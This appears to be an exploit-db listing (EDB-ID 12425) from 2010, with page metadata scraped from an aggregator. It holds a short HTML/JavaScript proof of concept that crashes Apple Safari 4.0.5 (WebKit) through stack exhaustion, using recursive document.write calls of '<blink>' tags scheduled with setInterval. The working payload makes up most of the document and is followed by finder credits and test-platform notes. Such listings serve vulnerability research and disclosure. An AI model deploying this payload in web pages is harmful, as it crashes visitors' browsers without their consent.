Lucene search

K
exploitdbDr_IDEEDB-ID:12425
HistoryApr 27, 2010 - 12:00 a.m.

Webkit (Apple Safari 4.0.5) - Blink Tag Stack Exhaustion Denial of Service

2010-04-2700:00:00
Dr_IDE
www.exploit-db.com
19

AI Score

7.4

Confidence

Low

<html>
<script>
loop1();
    var a = "<blink>";
function loop1()
{
	document.write(a);
    setInterval(loop2,0);
}
function loop2()
{
	document.write(a);
	setInterval(loop1,0);
}
</script>
<body>
Webkit (Safari) Stack Exhaustion DoS
Found By:	Dr_IDE
Credit To:	Mattias Karlsson
Reference:	http://www.exploit-db.com/exploits/12401
Tested On:	Windows 7 + Safari 4.0.5
</body>
</html>